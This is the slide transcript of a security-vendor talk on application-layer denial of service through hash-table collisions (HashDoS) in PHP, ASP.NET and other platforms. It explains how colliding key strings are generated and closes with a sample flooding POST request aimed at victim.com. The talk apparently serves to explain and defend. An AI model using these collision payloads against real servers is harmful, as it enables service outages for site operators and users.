slide1 l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Layer-7 DoS Hash Collisions PowerPoint Presentation
Download Presentation
Layer-7 DoS Hash Collisions

Loading in 2 Seconds...

play fullscreen
1 / 20

Layer-7 DoS Hash Collisions - PowerPoint PPT Presentation


  • 136 Views
  • Uploaded on

Layer-7 DoS Hash Collisions. About Hybrid Security. Provide cyber fraud protection to websites Prevent business logic attacks on web applications Heuristic web user behavior analysis Signature-free 0-day attack detection.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Layer-7 DoS Hash Collisions' - margo


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
slide1
Layer-7 DoS

Hash Collisions

slide2

About Hybrid Security

  • Provide cyber fraud protection to websites
  • Prevent business logic attacks on web applications
  • Heuristic web user behavior analysis
  • Signature-free 0-day attack detection
slide3

Slowloris: Written by RSnake, exploits slow HTTP headers

  • R.U.Dead.Yet: Written by Raviv Raz, exploits slow POST fields
  • Keep-Dead: Written by Esrun, exploits long Keep-Alive sessions

Layer-7 DoS

slide4

HashDoS – Advisory published by Julian Wäld & Alexander Klink, Dec. 28, 2011

  • Vulnerability in ASP.NET (MS11-100)
  • Vulnerability in PHP 4 and 5
  • Also vulnerable:Java, Tomcat, Python, Ruby, Oracle

Hash DoS

slide5

login=root

passwd=123

Hash Tables

Hash Key

Insert, search, delete node

with O(n) complexity

slide6

EzEz=123

EzFY=123

FYEz=123

Hash Collisions

Hash Key

When h(Ez) = h(FY)…

Insert, search, delete node

become O(n²) complexity

slide7
DJBX33A Hashing
  • Daniel J. Bernsetin, 33 additions
  • Used in 32 bit PHP 5, Java Tomcat
  • Similar function used in Ruby
slide8
Hashing With the Pigeons
  • Apparently, a non-injective function
  • More commonly known as the pigeonhole principle

Strings

Hashes

slide9
DJBX33X Hashing
  • Daniel J. Bernsetin, 33 XORs
  • Used in 32/64 bit PHP 4 & ASP.NET
  • Similar function used in Python
slide10
Linear Collision Generation

h('Ey') = 31¹ · 69 + 31° · 121 = 2260

h('FZ') = 31¹ · 70 + 31° · 90 = 2260

h('Eya') = 31 · (31¹ · 69 + 31° · 121) + 31°·97

= 31 · (31¹ · 70 + 31° · 90) + 31°·97

= h('FZa')

slide12
Using Binary Permutations

h('EzEz')  (00)

= h('EzFY')  (01)

= h('FYEz')  (10)

= h('FYFY')  (11)

slide13
Pre-computing rainbow tables
  • Calculate long permutations of colliding char pairs
  • Create many same-hash field names for POST
  • More advanced Meet-In-The-Middle techniques improve rainbow table creation exponentially
slide14
PHP 5
  • DJBX33X
  • 1 Gbit speed keeps ~ 10,000 i7 core CPU busy
  • POST limited by 8 MB
  • POST limited by max_input_time (default on Ubuntu/BSD = 60 seconds)
slide15

<?

php echo$_POST["param"];

?>

slide16

DJBX33X

  • Breakable using Meet-In-The-Middle
  • 30 kbits/sec keeps 1 core-2 CPU busy
  • With 1 Gbit keeps ~ 30,000 core-2 CPU busy
slide17

<%

Response.Write Request.Form['param'];

%>

slide18

POST http://victim.com/

Host: victim.com

Connection: keep-alive

Content-Length: 1000000

User-Agent: Mozilla/5.0

Cookie: __utmz=181569312.1294666144.1.1

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&

EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…

slide20
Thank You

raviv@hybridsec.com

http://www.hybridsec.com